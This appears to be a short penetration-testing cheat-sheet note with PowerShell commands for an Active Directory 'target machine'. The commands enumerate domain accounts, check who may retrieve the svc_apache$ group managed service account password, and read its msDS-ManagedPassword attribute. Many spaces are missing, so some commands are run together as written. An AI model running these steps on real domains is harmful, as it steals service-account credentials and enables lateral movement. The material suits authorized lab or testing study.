# Target machine# Check domain username and see any service accountPS> netusers/domain# Check svc_apache propertiesPS> Get-ADServiceAccount-Identity'svc_apache$'-Properties*# Enumerate if you can get a password from the service accountPS> Get-ADServiceAccount-Identity'svc_apache$'-Properties*|SelectPrincipalsAllowedToRetrieveManagedPassword# Check if you can get a password hashget-ADServiceAccount-Identity'svc_apache$'-Properties'msDS-ManagedPassword'$gmsa = Get-ADServiceAccount -Identity 'svc_apache$' -Properties 'msDS-ManagedPassword'$mp = $gmsa.'msDS-ManagedPassword'$mp